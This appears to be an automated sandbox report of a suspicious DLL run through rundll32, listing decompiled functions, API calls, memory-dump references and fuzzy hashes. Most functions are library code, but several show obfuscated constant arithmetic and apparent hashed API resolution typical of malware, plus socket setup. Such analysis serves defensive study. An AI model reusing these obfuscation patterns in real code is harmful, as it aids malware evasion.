				_v8 = E1001703B(_t25, _t29, _t33, _t34, 0x5f5e100);
				if(_v8 != 0) {
					_v12 = 0x5f5e100;
					_v16 = 0;
					_v20 = _v8;
					while(1) {
						__eflags = _v16 - 0x5f5e100;
						if(__eflags >= 0) {
							break;
						}
						 *_v20 = _v16;
						_v16 = _v16 + 1;
						_t32 = _v20 + 1;
						__eflags = _t32;
						_v20 = _t32;
					}
					_push(_v8); // executed
					E10016380(_t25, _t33, _t34, __eflags); // executed
					__eflags = _v16 - _v12;
					if(_v16 != _v12) {
						return 3;
					}
					return 0;
				}
				return 3;
			}

APIs

_malloc.LIBCMT ref: 1000886B

Part of subcall function 1001703B: __FF_MSGBANNER.LIBCMT ref: 1001705E
Part of subcall function 1001703B: __NMSG_WRITE.LIBCMT ref: 10017065
Part of subcall function 1001703B: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562,00000001), ref: 100170B3

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 40bd655b06e48b04370c20bd75be719fcb86c010ff12dc3827a327f63544bac9
Instruction ID: 9e6909d06ecd8ca97a2f758cde8d66f904c366c92fb4d9c13ba1bad92c8ee0bf
Opcode Fuzzy Hash: 40bd655b06e48b04370c20bd75be719fcb86c010ff12dc3827a327f63544bac9
Instruction Fuzzy Hash: 9A0178B4D0424CEFEB00CFA4C8446AEBBB4FB04354F60C8A9D9516B349E735AB00DB81

Uniqueness

Uniqueness Score: -1.00%

Function 04C1D11A, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E04C1D11A() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t39;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x78f5c7;
				_v32 = 0xa12bb9;
				_v28 = 0x4eca09;
				_v8 = 0x8b256f;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x4a7d0011;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00073d60;
				_v20 = 0x1e549a;
				_v20 = _v20 + 0xffffad33;
				_v20 = _v20 ^ 0x00134b4f;
				_v16 = 0x8dd9dd;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x0460bc3c;
				_v12 = 0x358059;
				_v12 = _v12 + 0xb97b;
				_v12 = _v12 ^ 0x003502df;
				E04C0EB52(_t39, _t39, 0x83891850, 0x1c, 0xa2289af1);
				ExitProcess(0);
			}

0x04c1d120
0x04c1d124
0x04c1d12b
0x04c1d132
0x04c1d139
0x04c1d140
0x04c1d144
0x04c1d14b
0x04c1d14f
0x04c1d156
0x04c1d15d
0x04c1d164
0x04c1d16b
0x04c1d172
0x04c1d176
0x04c1d17d
0x04c1d184
0x04c1d18b
0x04c1d1ac
0x04c1d1b6

APIs

ExitProcess.KERNEL32(00000000), ref: 04C1D1B6

Memory Dump Source

Source File: 00000003.00000002.351221459.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true

Associated: 00000003.00000002.351214986.0000000004C00000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.351289257.0000000004C26000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4c00000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction ID: 8da2d64823aab3bd78df3705030ae34e74ff1ab56fd93ca3c7ef28a61297bad7
Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction Fuzzy Hash: 4511E2B1C4430DEBDB54DFE5D94A6DEFBB0EB00749F108588D521B6250D3B89B489F91

Uniqueness

Uniqueness Score: -1.00%

Function 04C2061D, Relevance: 1.3, APIs: 1, Instructions: 52
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E04C2061D(void* __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t44;
				int _t53;
				WCHAR* _t56;

				_push(_a12);
				_t56 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04C1FE29(_t44);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xcd60b7;
				_v12 = 0x7257ab;
				_v12 = _v12 << 0xd;
				_v12 = _v12 + 0x8f69;
				_v12 = _v12 * 0x4c;
				_v12 = _v12 ^ 0x410f7a13;
				_v8 = 0x7b4696;
				_v8 = _v8 + 0xffff4950;
				_v8 = _v8 | 0x2a0f624b;
				_v8 = _v8 * 0x3a;
				_v8 = _v8 ^ 0xa0f3ec54;
				_v20 = 0x8a2161;
				_v20 = _v20 + 0xffff45ea;
				_v20 = _v20 ^ 0x1b6c7fa6;
				_v20 = _v20 ^ 0x1be8dede;
				_v16 = 0xdcc12a;
				_v16 = _v16 + 0xb9f4;
				_v16 = _v16 + 0xffffcfef;
				_v16 = _v16 ^ 0x00d9de04;
				E04C0EB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
				_t53 = lstrcmpiW(_a4, _t56); // executed
				return _t53;
			}

0x04c20624
0x04c20627
0x04c20629
0x04c2062c
0x04c2062f
0x04c20630
0x04c20631
0x04c20636
0x04c2063d
0x04c20644
0x04c2064b
0x04c2064f
0x04c20667
0x04c2066a
0x04c20671
0x04c20678
0x04c2067f
0x04c2068b
0x04c2068e
0x04c20695
0x04c2069c
0x04c206a3
0x04c206aa
0x04c206b1
0x04c206b8
0x04c206bf
0x04c206c6
0x04c206d9
0x04c206e5
0x04c206eb

APIs

lstrcmpiW.KERNELBASE(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04C206E5

Memory Dump Source

Source File: 00000003.00000002.351221459.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true

Associated: 00000003.00000002.351214986.0000000004C00000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.351289257.0000000004C26000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4c00000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction ID: 5ec6bb8fba927f8aa693e618acf3ca5d15a7f990c241637a3c9f836c2c02e969
Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction Fuzzy Hash: 322113B1C01309ABCF14DFA9D9899DEBFB5FB10354F108198E529A6251D3B49B04DF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 100011C0, Relevance: 10.6, APIs: 7, Instructions: 69networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 100011F1
_memset.LIBCMT ref: 10001205
htonl.WS2_32(00000000), ref: 1000121B
htons.WS2_32(?), ref: 1000122F
socket.WS2_32(00000002,00000002,00000000), ref: 10001245
bind.WS2_32(?,?,00000010), ref: 1000126A
setsockopt.WS2_32(?,0000FFFF,00001006,00000001,00000008), ref: 100012AC

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Startup_memsetbindhtonlhtonssetsockoptsocket
String ID:
API String ID: 1003240404-0
Opcode ID: 8abc6e71fccd75ffbc511335db1503be54d7970832d8f44548303c29e94ff06c
Instruction ID: 88ed1bb05716eef25c8d7e89d15ea7d56457a166ccc4c5acc9453768105f33a4
Opcode Fuzzy Hash: 8abc6e71fccd75ffbc511335db1503be54d7970832d8f44548303c29e94ff06c
Instruction Fuzzy Hash: 1C215974A01228AFE760DF60CC85BD9B7B4EF49714F1081D8E949AB381CB71A9C2DF51

Uniqueness

Uniqueness Score: -1.00%

Function 10008B90, Relevance: 9.1, APIs: 6, Instructions: 83
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E10008B90(intOrPtr __ecx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				struct HDC__* _v120;
				char _v124;
				int _v128;
				int _v132;
				int _v136;
				struct HICON__* _v140;
				intOrPtr _v144;
				void* __ebp;
				signed int _t37;
				int _t40;
				void* _t41;
				void* _t66;
				struct tagRECT* _t82;
				void* _t84;
				void* _t85;
				signed int _t86;

				_t37 =  *0x10057a08; // 0x4959db98
				_v32 = _t37 ^ _t86;
				_v144 = __ecx;
				_t40 = IsIconic( *(_v144 + 0x20));
				_t87 = _t40;
				if(_t40 == 0) {
					_t41 = E1000C473(_t66, _v144, _t84, _t85, __eflags);
				} else {
					_push(_v144);
					E10013247(_t66,  &_v124, _t84, _t85, _t87);
					_t88 =  &_v124;
					if( &_v124 != 0) {
						_v136 = _v120;
					} else {
						_v136 = 0;
					}
					SendMessageA( *(_v144 + 0x20), 0x27, _v136, 0);
					_v128 = GetSystemMetrics(0xb);
					_v132 = GetSystemMetrics(0xc);
					_t82 =  &_v28;
					GetClientRect( *(_v144 + 0x20), _t82);
					asm("cdq");
					_v12 = _v20 - _v28 - _v128 + 1 - _t82 >> 1;
					asm("cdq");
					_v8 = _v16 - _v24 - _v132 + 1 - _t82 >> 1;
					_v140 =  *((intOrPtr*)(_v144 + 0x188));
					_t79 = _v8;
					DrawIcon(_v120, _v12, _v8, _v140);
					_t41 = E1001329B(_t66,  &_v124, _t84, _t85, _t88);
				}
				return E100167D5(_t41, _t66, _v32 ^ _t86, _t79, _t84, _t85);
			}

APIs

IsIconic.USER32 ref: 10008BB3

Part of subcall function 10013247: __EH_prolog3.LIBCMT ref: 1001324E
Part of subcall function 10013247: BeginPaint.USER32(?,?,00000004,1000C48A,?,00000058,10008C99), ref: 1001327A

SendMessageA.USER32(?,00000027,?,00000000), ref: 10008C01
GetSystemMetrics.USER32 ref: 10008C09
GetSystemMetrics.USER32 ref: 10008C14
GetClientRect.USER32 ref: 10008C2B
DrawIcon.USER32 ref: 10008C7E

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MetricsSystem$BeginClientDrawH_prolog3IconIconicMessagePaintRectSend
String ID:
API String ID: 1007970657-0
Opcode ID: 34b2481c73848cf5a5b65619b116645cb85ce5e5c475ca315779ed2509392efd
Instruction ID: 92cad86a1f48a06ffd889b7e25b84ff06398f92b7342aaec6ad7b9fd969ef154
Opcode Fuzzy Hash: 34b2481c73848cf5a5b65619b116645cb85ce5e5c475ca315779ed2509392efd
Instruction Fuzzy Hash: BB31F975A00119DFEB24CFA8C995F9EBBB4FF48240F108299E549E7285DE30AA44CF60

Uniqueness

Uniqueness Score: -1.00%

Function 1000A803, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70
libraryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1000A803(void* __ebx, void* __ecx, void* __edx, void* __edi, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __esi;
				void* __ebp;
				signed int _t9;
				intOrPtr* _t18;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t34;
				void* _t35;
				signed int _t36;
				void* _t37;

				_t33 = __edi;
				_t32 = __edx;
				_t28 = __ecx;
				_t26 = __ebx;
				_t9 =  *0x10057a08; // 0x4959db98
				_v8 = _t9 ^ _t36;
				_t39 = _a4 - 0x800;
				_t35 = __ecx;
				if(_a4 != 0x800) {
					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					_push(E1001808E(__edx,  &_v288, 4, "LOC"));
					E10009BC7(__ebx, _t28, __edi, _t35);
					_t37 = _t37 + 0x10;
					L2:
					_push(_t26);
					_push(_t33);
					_t34 =  *(E10017D62(_t39));
					 *(E10017D62(_t39)) =  *_t14 & 0x00000000;
					_t35 = 0x112;
					_t27 = E10016E0C( &_v284, 0x112, 0x111, 0x112,  &_v288);
					_t18 = E10017D62(_t39);
					_t40 =  *_t18;
					if( *_t18 == 0) {
						 *(E10017D62(__eflags)) = _t34;
					} else {
						E10009DD1( *((intOrPtr*)(E10017D62(_t40))));
					}
					if(_t27 == 0xffffffff || _t27 >= _t35) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
					_pop(_t33);
					_pop(_t26);
				}
				return E100167D5(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
			}

APIs

_strcpy_s.LIBCMT ref: 1000A830

Part of subcall function 10009BC7: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 10009BC7: __EH_prolog3.LIBCMT ref: 1000A0FC

Part of subcall function 10017D62: __getptd_noexit.LIBCMT ref: 10017D62

__snprintf_s.LIBCMT ref: 1000A869

Part of subcall function 10016E0C: __vsnprintf_s_l.LIBCMT ref: 10016E21

GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 1000A894
LoadLibraryA.KERNEL32(?), ref: 1000A8B7

Strings

LOC, xrefs: 1000A828

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8H_prolog3InfoLibraryLoadLocaleThrow__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
String ID: LOC
API String ID: 4018564869-519433814
Opcode ID: 85c29d921faf756db8e7e017259237103e49a4f88e38b04ce28b663785a5d064
Instruction ID: ee9450464cbd3e0ce3331b4d2b41357aa0e69ec1529eb2fe66138b72776ed960
Opcode Fuzzy Hash: 85c29d921faf756db8e7e017259237103e49a4f88e38b04ce28b663785a5d064
Instruction Fuzzy Hash: A9119A7190411CABF725D760DC86BDD37B8EF06790F504161F6049B191DF74AEC68BA1

Uniqueness

Uniqueness Score: -1.00%

Function 100167D5, Relevance: 7.6, APIs: 5, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E100167D5(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x10057a08; // 0x4959db98
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x1005afc0 = _t6;
				 *0x1005afbc = _t22;
				 *0x1005afb8 = _t25;
				 *0x1005afb4 = _t21;
				 *0x1005afb0 = _t27;
				 *0x1005afac = _t26;
				 *0x1005afd8 = ss;
				 *0x1005afcc = cs;
				 *0x1005afa8 = ds;
				 *0x1005afa4 = es;
				 *0x1005afa0 = fs;
				 *0x1005af9c = gs;
				asm("pushfd");
				_pop( *0x1005afd0);
				 *0x1005afc4 =  *_t31;
				 *0x1005afc8 = _v0;
				 *0x1005afd4 =  &_a4;
				 *0x1005af10 = 0x10001;
				_t11 =  *0x1005afc8; // 0x0
				 *0x1005aec4 = _t11;
				 *0x1005aeb8 = 0xc0000409;
				 *0x1005aebc = 1;
				_t12 =  *0x10057a08; // 0x4959db98
				_v812 = _t12;
				_t13 =  *0x10057a0c; // 0xb6a62467
				_v808 = _t13;
				 *0x1005af08 = IsDebuggerPresent();
				_push(1);
				E100227FB(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x1002b434);
				if( *0x1005af08 == 0) {
					_push(1);
					E100227FB(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

APIs

IsDebuggerPresent.KERNEL32 ref: 1001C445
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001C45A
UnhandledExceptionFilter.KERNEL32(1002B434), ref: 1001C465
GetCurrentProcess.KERNEL32(C0000409), ref: 1001C481
TerminateProcess.KERNEL32(00000000), ref: 1001C488

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 7284fa7d50281a3c049889d49720807c61de6750ecda71a27977002e3826e049
Instruction ID: 29b7c1aed7e77d05a339182a33a9266dca5d513d51f4b37265af4c9016ee4a47
Opcode Fuzzy Hash: 7284fa7d50281a3c049889d49720807c61de6750ecda71a27977002e3826e049
Instruction Fuzzy Hash: 0021B0B4408328DFE701DFA9EDC96487BB0FB0A315F50406AE508873A1E7B459C2CF55

Uniqueness

Uniqueness Score: -1.00%

Function 1000FF59, Relevance: 6.0, APIs: 4, Instructions: 41
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000FF59(void* __ecx) {
				void* __ebx;
				void* __edi;
				signed int _t5;
				void* _t15;
				void* _t18;
				void* _t19;

				_t15 = __ecx;
				if((E10012862(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E1000FAB8(_t15, _t15, _t18, __eflags);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t19 = E1000A7CE();
				if(_t19 == 0) {
					goto L6;
				}
				_t18 = GetKeyState;
				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
					return 1;
				}
			}

0x1000ff5c
0x1000ff68
0x1000ffb0
0x1000ffb2
0x1000ffb9
0x00000000
0x1000ffbb
0x1000ff6f
0x1000ff73
0x00000000
0x00000000
0x1000ff75
0x1000ff82
0x00000000
0x1000ff96
0x1000ffa5
0x00000000
0x1000ffad

APIs

Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D

GetKeyState.USER32 ref: 1000FF7D
GetKeyState.USER32 ref: 1000FF86
GetKeyState.USER32 ref: 1000FF8F
SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 1000FFA5

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: fb4c216abc4c33cb282e021b119ac4542c3b2f6db45558139360cfc9261ccdec
Instruction ID: de176050283294f5fba88da379e0eecc3ccd74c62a8982f524273e82d2dc9d2d
Opcode Fuzzy Hash: fb4c216abc4c33cb282e021b119ac4542c3b2f6db45558139360cfc9261ccdec
Instruction Fuzzy Hash: 3BF0827B38025B26FA20B2748C41FBA9154CF86BD0F120538FA42EA5DECF91D8022271

Uniqueness

Uniqueness Score: -1.00%

Function 1000AA3A, Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E1000AA3A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x10057a08; // 0x4959db98
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E10017BC1(E10027E56, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, E1000A1E3, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E1001815B( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E100174D0(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x10000000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					E1000A1F9(_t181 - 0x3c, 0x10000000, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(E1000A2A9(_t181 - 0x3c, _t181 - 0x64) != 0) {
						E1000A2DF(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E1000A8D0(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E1000A803(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]);
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E100167D5(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 1000AA59
GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 1000AA7A
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1000AA8B
ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC1
ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC9
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1000AADD
ConvertDefaultLocale.KERNEL32(?), ref: 1000AB01
ConvertDefaultLocale.KERNEL32(000003FF), ref: 1000AB07
GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 1000AB40
GetVersion.KERNEL32 ref: 1000AB55
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 1000AB7A
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 1000AB9F
